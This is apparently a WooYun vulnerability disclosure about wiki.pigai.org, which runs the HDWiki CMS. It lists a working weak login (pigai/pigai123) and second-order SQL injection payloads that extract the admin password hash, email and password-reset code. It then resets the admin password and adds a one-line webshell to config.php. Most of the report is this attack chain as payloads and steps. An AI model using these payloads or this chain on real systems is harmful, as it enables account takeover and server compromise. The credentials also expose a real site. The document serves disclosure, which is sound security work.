WooYun.org

http://wiki.pigai.org/
某账户存在弱口令
pigai pigai123
成功登陆。

该分站采用的是hdwiki的cms，该cms存在漏洞。
1.注入漏洞
相关请看乌云
WooYun: hdwiki二次注入
直接提交评论

',1236789,1), ('admin','1','0','2','admin','xxx',(select concat(username,0x20,password) from wiki_user where uid=1),236789,1)#

//注意换行符 会被转义 所以提交之前看清楚
点举报--确定--然后返回短信息

结果发现该md5无法解开，看来管理员安全意识挺强，密码复杂。
继续。
漏洞2
WooYun: Hdwiki 设计缺陷 知邮箱可改密码（包括管理员）
该漏洞引发我的思考，其实我们根本不用去爆破auth。
结合这个sql注入，就可以直接拿到存在表中的code。
找回密码的code存在表wiki_activation中，先通过注入得到管理员的邮箱。

',1236789,1), ('admin','1','0','2','admin','xxx',(select email from wiki_user where uid=1),236789,1)#

邮箱为[email protected]

然后注入出wiki_activation表中的code。

',1236789,1), ('admin','1','0','2','admin','xxx',(select code from wiki_activation where uid=1 order by time desc limit 1),236789,1)#

访问链接：
http://wiki.pigai.org/index.php?user-getpass-1-f728f481f5d0a21d0604fa544d421858
重设管理员密码
（此处重设为test1test2）
成功登陆

接下来可以getshell
后台--模块--文件管理
貌似只有config.php有权限，添加一个一句话木马。

成功拿到shell。